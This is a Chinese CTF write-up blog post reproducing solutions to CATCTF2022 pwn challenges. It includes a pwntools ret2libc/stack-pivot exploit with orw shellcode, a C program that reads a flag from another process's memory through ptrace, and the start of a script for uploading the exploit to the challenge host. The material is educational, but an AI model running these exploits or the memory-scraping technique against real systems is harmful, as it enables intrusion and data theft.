<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-bounce.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"zikh26.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"default"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="CATCTF2022 PWN赛题复现">
<meta property="og:type" content="article">
<meta property="og:title" content="CATCTF2022_pwn复现">
<meta property="og:url" content="https://zikh26.github.io/posts/74f96fff.html">
<meta property="og:site_name" content="ZIKH26&#39;s Blog">
<meta property="og:description" content="CATCTF2022 PWN赛题复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301041745431.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112149112.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112154233.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112158735.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112245220.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301120046474.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131110883.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131739623.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131842540.png">
<meta property="article:published_time" content="2023-05-14T23:36:47.475Z">
<meta property="article:modified_time" content="2023-07-01T12:02:33.638Z">
<meta property="article:author" content="ZIKH26">
<meta property="article:tag" content="栈迁移">
<meta property="article:tag" content="沙箱">
<meta property="article:tag" content="C++">
<meta property="article:tag" content="栈溢出">
<meta property="article:tag" content="进程注入">
<meta property="article:tag" content="上传脚本">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301041745431.png">


<link rel="canonical" href="https://zikh26.github.io/posts/74f96fff.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://zikh26.github.io/posts/74f96fff.html","path":"posts/74f96fff.html","title":"CATCTF2022_pwn复现"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>CATCTF2022_pwn复现 | ZIKH26's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">ZIKH26's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-友链"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#welcome-CAT-CTF"><span class="nav-number">1.</span> <span class="nav-text">welcome_CAT_CTF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#bitcoin"><span class="nav-number">2.</span> <span class="nav-text">bitcoin</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%E7%AD%96%E7%95%A5"><span class="nav-number">2.0.1.</span> <span class="nav-text">保护策略</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%80%E5%9C%A8%EF%BC%9A"><span class="nav-number">2.0.2.</span> <span class="nav-text">漏洞所在：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-number">2.0.3.</span> <span class="nav-text">利用思路：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#EXP"><span class="nav-number">2.0.4.</span> <span class="nav-text">EXP:</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#injection2-0"><span class="nav-number">3.</span> <span class="nav-text">injection2.0</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%88%86%E6%9E%90"><span class="nav-number">3.1.</span> <span class="nav-text">文件分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF%EF%BC%9A-1"><span class="nav-number">3.2.</span> <span class="nav-text">利用思路：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0%EF%BC%9A"><span class="nav-number">4.</span> <span class="nav-text">参考文章：</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ZIKH26"
      src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
  <p class="site-author-name" itemprop="name">ZIKH26</p>
  <div class="site-description" itemprop="description">万古凡间一过客，九天之上第一仙</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">113</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">113</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zikh26.github.io/posts/74f96fff.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
      <meta itemprop="name" content="ZIKH26">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZIKH26's Blog">
      <meta itemprop="description" content="万古凡间一过客，九天之上第一仙">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="CATCTF2022_pwn复现 | ZIKH26's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CATCTF2022_pwn复现
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-05-15 07:36:47" itemprop="dateCreated datePublished" datetime="2023-05-15T07:36:47+08:00">2023-05-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-07-01 20:02:33" itemprop="dateModified" datetime="2023-07-01T20:02:33+08:00">2023-07-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E8%B5%9B%E9%A2%98WP/" itemprop="url" rel="index"><span itemprop="name">赛题WP</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>CATCTF2022 PWN赛题复现</p>
<span id="more"></span>

<h2 id="welcome-CAT-CTF"><a href="#welcome-CAT-CTF" class="headerlink" title="welcome_CAT_CTF"></a>welcome_CAT_CTF</h2><p>运行程序，发现是一个小游戏，可以上下左右来移动 <code>@</code> 这个字符，并且程序运行之初询问了服务器的 IP 和端口。</p>
<p>看伪代码的这里(如下)</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301041745431.png"></p>
<p>如果能进入此处的 if ，那么就可以获取到服务器上的 <code>flag</code> ，条件有两个，第一个是满足<code>s[100 * v0 - 100 + v1] == &amp;unk_963B</code> 这个后面的其实就是字符 <code>@</code> 。</p>
<p>而在按下 <code>w</code> 键，进行的操作如下</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&#x27;w&#x27;</span>:</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">char</span> *)s[<span class="number">100</span> * v0 - <span class="number">100</span> + v1] == <span class="string">&quot; &quot;</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    s[<span class="number">100</span> * v0-- + v1] = (__int64)<span class="string">&quot; &quot;</span>;</span><br><span class="line">    s[<span class="number">100</span> * v0 + v1] = (__int64)&amp;unk_963B;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>按照逻辑可以猜测，按下 <code>w</code> 是向上移动，而向上移动的前提肯定是上面的那个内存要是空格，不然当前 <code>@</code> 上面有字符是无法向上移动的(可以结合程序运行发现这一点)，所以可以猜测 <code>s[100 * v0 - 100 + v1]</code>指向的就是当前字符 <code> @</code> 的上一个格子，因此获取 <code>flag</code> 的那个 if 前面的判断就是需要当前 <code>@</code> 上面的格子里也是一个 <code>@</code>，实现这一点只需要简单的 <code>adws</code>来移动即可。</p>
<p>而程序正常运行的话无论如何也无法让 <code>glod</code> 这个变量大于 <code>100000000</code> ，而获取 <code>flag</code> 的方式只要是进入这个 if 判断就可以获取，因此可以使用 <code>gdb</code> 中的 <code>set</code> 命令修改变量的值，从而绕过检查。</p>
<p>总结一下就是先用 <code>gdb</code> 修改 <code>glod</code> 这个全局变量大于 <code>100000000</code> ，接着让 <code>@</code> 移动到 <code>@</code>下面，然后按下 <code>j</code> (因为获取 <code>flag</code> 的那个 if 条件是在 <code>case: ‘j’</code> 下面的) 即可获取flag</p>
<h2 id="bitcoin"><a href="#bitcoin" class="headerlink" title="bitcoin"></a>bitcoin</h2><p>这题当时就扫了一眼，一看是 <code>C++</code> 的题目直接跑路了，不过比赛完了之后入门了一下 <code>C++</code> 所以现在正找 <code>C++</code> 的题目练练手呢（ <code>winmt</code> 师傅出的那个除外，实在感觉太难辣，如果有可能的话放到最后复现，如果没可能的话就跑路了 QAQ ），这道题其实一点也不难，就是一个常规的栈溢出，不过 <code>C++</code> 写的程序，确实跟之前做的常规栈溢出还有一点不太一样。</p>
<p>关于 <code>C++</code> 零基础入门，从零到零点一的话，可以看这篇<a href="https://zikh26.github.io/posts/4320fd7a.html">文章</a></p>
<h4 id="保护策略"><a href="#保护策略" class="headerlink" title="保护策略"></a>保护策略</h4><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112149112.png" alt="image-20230111214911908" style="zoom: 67%;" />

<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112154233.png" alt="image-20230111215447098" style="zoom:50%;" />



<h4 id="漏洞所在："><a href="#漏洞所在：" class="headerlink" title="漏洞所在："></a>漏洞所在：</h4><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112158735.png" alt="image-20230111215853664" style="zoom:50%;" />

<p>因为没有开 <code>canary</code> ，因此这里 <code>std::cin &gt;&gt; v4</code> 包括往 <code>v3</code> 中输入数据都是存在栈溢出的。</p>
<p>所以常规打一个 <code>ret2libc</code> 即可，然后程序禁用了 <code>execve</code> ，最后去执行 <code>orw</code> </p>
<h4 id="利用思路："><a href="#利用思路：" class="headerlink" title="利用思路："></a>利用思路：</h4><p>这里要说明一点，本题要再次输入的话，要利用 <code>cin &gt;&gt;</code> 来实现，这个东西是需要控制两个参数的，第一个是 <code>std::cin</code> 的地址，第二个是写入数据的目标地址。而执行的地方为</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301112245220.png" alt="image-20230111224545172"></p>
<p>有一点像 <code>scanf</code> 函数，然后就是先泄露 <code>libc</code> 地址，同时控制 <code>rbp</code> 的值为接下来的栈迁移做一个准备，再做一个往 <code>bss</code> 段上输入的 <code>rop</code> ，最后给一个 <code>leave ; ret</code> 触发栈迁移。准备往 <code>bss</code> 段上写的 <code>rop</code> 是在已经有了 <code>libc</code> 地址的情况下做的，因此我们可以去调用 <code>mprotect</code> 函数将 <code>bss</code> 段改为可读可写可执行，后面紧跟着执行 <code>orw</code> 的 <code>shellcode</code>。</p>
<p>其实泄露的 <code>libc</code> 地址就一个用处，就是从 <code>libc</code> 中取了一个 <code>pop rdx ; ret</code> 这个 <code>gadget</code> </p>
<p>需要注意的是， <code>orw</code> 之前必须要先把标准输入给 <code>close</code> 掉。也就是先执行 <code>close(1)</code> 再 <code>open</code> <code>read</code> <code>write</code>  不然远程打印不出来 <code>flag</code></p>
<h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP:"></a>EXP:</h4><figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">p,e,libc=load(<span class="string">&quot;pwn&quot;</span>,<span class="string">&quot;61.147.171.105:61597&quot;</span>)</span><br><span class="line">pop_rdi=<span class="number">0x0000000000406303</span></span><br><span class="line">pop_rsi_r15=<span class="number">0x0000000000406301</span></span><br><span class="line">cin_addr=<span class="number">0x6093A0</span></span><br><span class="line">use_cin=<span class="number">0x401C30</span> </span><br><span class="line">bss_addr=<span class="number">0x609530</span></span><br><span class="line">leave_addr=<span class="number">0x40223A</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(e.got[<span class="string">&#x27;printf&#x27;</span>]))</span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*<span class="number">0x40</span>+p64(bss_addr-<span class="number">8</span>)+p64(<span class="number">0x40223B</span>)+p64(pop_rdi)+p64(e.got[<span class="string">&#x27;mprotect&#x27;</span>])+p64(e.plt[<span class="string">&#x27;printf&#x27;</span>])</span><br><span class="line">payload+=p64(pop_rdi)+p64(cin_addr)+p64(pop_rsi_r15)+p64(bss_addr)+p64(<span class="number">0</span>)+p64(use_cin)+p64(leave_addr)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Name: &quot;</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">debug(p,<span class="number">0x4021D8</span>,<span class="number">0x401C30</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Password: &quot;</span>,payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">mprotect_addr=u64(p.recvuntil(<span class="string">&quot;\x7f&quot;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base=mprotect_addr-libc.symbols[<span class="string">&#x27;mprotect&#x27;</span>]</span><br><span class="line">log_addr(<span class="string">&#x27;mprotect_addr&#x27;</span>)</span><br><span class="line">log_addr(<span class="string">&#x27;libc_base&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdx=libc_base+<span class="number">0x0000000000001b96</span></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">orw=<span class="string">b&quot;\x6A\x00\x5F\x6A\x03\x58\x0F\x05\x48\xBE\x2F\x66\x6C\x61\x67\x00\x00\x00\x56\x54\x5E\x6A\x00\x5F\x6A\x00\x5A\x68\x01\x01\x00\x00\x58\x0F\x05\x50\x5F\x54\x5E\x6A\x50\x5A\x6A\x00\x58\x0F\x05\x6A\x01\x5F\x54\x5E\x6A\x50\x5A\x6A\x01\x58\x0F\x05&quot;</span></span><br><span class="line">payload=p64(pop_rdi)+p64(bss_addr&amp;<span class="number">0xfff000</span>)</span><br><span class="line">payload+=p64(pop_rsi_r15)+p64(<span class="number">0x1000</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload+=p64(pop_rdx)+p64(<span class="number">7</span>)</span><br><span class="line">payload+=p64(e.plt[<span class="string">&#x27;mprotect&#x27;</span>])</span><br><span class="line">payload+=p64(bss_addr+<span class="number">0x48</span>)</span><br><span class="line">payload+=orw</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301120046474.png" alt="image-20230112004628191"></p>
<h2 id="injection2-0"><a href="#injection2-0" class="headerlink" title="injection2.0"></a>injection2.0</h2><p>这种类型的题目是第一次见，跟着官方的 <code>WP</code> 复现一下。</p>
<h3 id="文件分析"><a href="#文件分析" class="headerlink" title="文件分析"></a>文件分析</h3><p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131110883.png" alt="image-20230113111031792"></p>
<p>给的文件是上面这些， <code>rootfs.img</code> 文件是一个文件系统映像文件，它是将 <code>_install</code> 文件进行了打包。所以这里是用 <code>qemu</code> 来模拟的，在 <code>_install</code> 文件中 <code>init</code> 作为 <code>qemu</code> 的初始化脚本。</p>
<p><code>init</code> 文件内容如下</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span></span><br><span class="line">echo &quot;INIT SCRIPT&quot;</span><br><span class="line">mkdir /tmp</span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">mount -t debugfs none /sys/kernel/debug</span><br><span class="line">mount -t tmpfs none /tmp</span><br><span class="line">echo 0 | tee /proc/sys/kernel/yama/ptrace_scope</span><br><span class="line">chown 0:0 flag</span><br><span class="line">chmod 755 flag</span><br><span class="line">exec 0&lt;/dev/console</span><br><span class="line">exec 1&gt;/dev/console</span><br><span class="line">exec 2&gt;/dev/console</span><br><span class="line">echo -e &quot;Boot took $(cut -d&#x27; &#x27; -f1 /proc/uptime) seconds&quot;</span><br><span class="line">./target &gt;pso.file 2&gt;&amp;1 &amp;</span><br><span class="line">setsid /bin/cttyhack setuidgid 0 /bin/sh</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">setsid /bin/cttyhack setuidgid 0 /bin/sh <span class="comment"># 修改 uid gid 为 0 以提权 /bin/sh 至 root。</span></span></span><br><span class="line">poweroff -f # 设置 shell 退出后则关闭机器</span><br></pre></td></tr></table></figure>

<p>而关键是在下面三句</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">echo 0 | tee /proc/sys/kernel/yama/ptrace_scope</span><br><span class="line">./target &gt;pso.file 2&gt;&amp;1 &amp;</span><br><span class="line">setsid /bin/cttyhack setuidgid 0 /bin/sh</span><br></pre></td></tr></table></figure>

<p>第一句是关闭了 <code>linux</code> 内核中的 <code>ptrace</code> 限制。<code>ptrace</code> 是一种 <code>linux</code> 内核中的进程调试功能，他可以让一个进程跟踪另一个进程的执行情况，跟踪进程可以访问被跟踪进程的内存空间和寄存器的值。为了防止恶意程序利用 <code>ptrace</code> 进行攻击，<code>Linux</code> 内核开发者在内核引入了 <code>yama</code> 的安全机制，其中的一个子模块 <code>ptrace_scope</code> 就是用来限制 <code>ptrace</code> 使用的，默认情况下， <code>yama</code> 的 <code>ptrace_scope</code> 被设置为 <code>1</code> ，这意味着只有当父进程和子进程属于同一用户时，才能跟踪子进程，<strong>如果设置为 <code>0</code> 就是关闭这个限制，任何进程都可以跟踪其他进程</strong>。</p>
<p>第二句是运行 <code>target</code> 程序，并将程序的标准输出和标准错误都重定向到 <code>pso.file</code> 文件，并将该进程设置为后台进程。</p>
<p>第三句是脱离原先的终端，并获取 <code>root</code> 权限</p>
<p>然后 <code>target</code> 文件内容如下</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202301131739623.png" alt="image-20230113173903535"></p>
<p>先将 <code>flag</code> 文件读入到栈上，然后 <code>close</code> 将三个文件流全部关闭，再将 <code>flag</code> 文件删除掉，最后有一个永真循环，不断打印休眠打印字符串（目的是让进程一直处于运行状态，不会结束）</p>
<h3 id="利用思路：-1"><a href="#利用思路：-1" class="headerlink" title="利用思路："></a>利用思路：</h3><p>因为将 <code>/proc/sys/kernel/yama/ptrace_scope</code> 设置为了 <code>0</code>,并且权限为 <code>root</code> 。因此可以使用 <code>ptrace</code> 接口来访问进程的内存。</p>
<p>首先执行命令 <code>ps -ef</code> 获取进程的 <code>PID</code> ，再用 <code>/proc/pid/maps</code> 获取栈地址，因为此时的进程依然在运行，所以 <code>flag</code> 依然存在到栈上，调用 <code>ptrace</code> 获取栈内数据比对 <code>flag</code> ，比对成功的话，就将接下来内存中的数据打印出来，从而获取 <code>flag</code> 。</p>
<p>而上面所说的比对并打印 <code>flag</code> 需要用C语言的脚本来实现，因为是第一次做这种题目，所以直接把官方的 <code>WP</code> 中的 <code>exp</code> 贴到这里了（主要感觉这种轮子没必要再去自己写一个，直接用或者根据需求再改改就挺好）</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ptrace.h&gt;</span></span></span><br><span class="line"><span class="comment">//cat /proc/131/maps</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argv , <span class="type">char</span> **argc)</span>&#123;</span><br><span class="line"> </span><br><span class="line">  <span class="type">int</span> data ;</span><br><span class="line">  <span class="type">int</span> stat ;</span><br><span class="line">  <span class="type">int</span> pid = atoi(argc[<span class="number">1</span>]) ;<span class="comment">//这里需要手动传入命令行参数 target的pid</span></span><br><span class="line">  ptrace(PTRACE_ATTACH, pid, <span class="literal">NULL</span>, <span class="literal">NULL</span>) ;</span><br><span class="line">  wait(&amp;stat) ;    <span class="comment">// 如果不wait，马上进行下一个ptrace的PEEK操作会造成 no such process 错误</span></span><br><span class="line">  <span class="type">long</span> <span class="type">long</span> <span class="type">int</span> addr = <span class="number">0</span> ;</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">&quot;%llx&quot;</span>,&amp;addr);</span><br><span class="line">  <span class="keyword">for</span> (; addr &lt; <span class="number">0x7ffffffff000</span>; ++addr)</span><br><span class="line">  &#123;</span><br><span class="line">    data = ptrace(PTRACE_PEEKDATA, pid, addr, <span class="literal">NULL</span>);    <span class="comment">// 一次读一个字节</span></span><br><span class="line">    <span class="keyword">if</span>(data==<span class="number">0x65636165</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;data = %x , addr = %llx\n&quot;</span> , data , addr) ;</span><br><span class="line">      <span class="type">long</span> <span class="type">long</span> <span class="type">int</span> addr1=addr<span class="number">-1</span>;</span><br><span class="line">      <span class="type">char</span> data1;</span><br><span class="line">      <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;<span class="number">100</span>;i++)</span><br><span class="line">      &#123;</span><br><span class="line">        addr1+=<span class="number">1</span>;</span><br><span class="line">        data1 = ptrace(PTRACE_PEEKDATA, pid, addr1, <span class="literal">NULL</span>);</span><br><span class="line">        <span class="comment">//write(1,data1,0x10);</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%c&quot;</span> , data1) ;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  ptrace(PTRACE_DETACH, pid, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1</span> ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是这个脚本我们是无法在远程的环境上编写并编译的，所以我们得在本地编译好，然后用 <code>python</code> 脚本将 <code>exp</code> 进行 <code>base64</code> 编码，然后上传到远程环境。</p>
<p><code>python</code> 脚本如下：</p>
<p>这个依然是官方的 <code>python</code> 脚本。作用就是将 <code>exp</code> 上传到远端环境中。</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"><span class="comment">#io = process(&quot;./boot.sh&quot;)</span></span><br><span class="line">io = remote(<span class="string">&quot;61.147.171.105&quot;</span>,<span class="number">61265</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exec_cmd</span>(<span class="params">cmd</span>):</span><br><span class="line">    io.sendline(cmd)</span><br><span class="line">    io.recvuntil(<span class="string">&quot;# &quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>(<span class="params">exp</span>):</span><br><span class="line">    p = log.progress(<span class="string">&quot;exp&quot;</span>)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./&quot;</span>+exp, <span class="string">&quot;rb&quot;</span>) <span 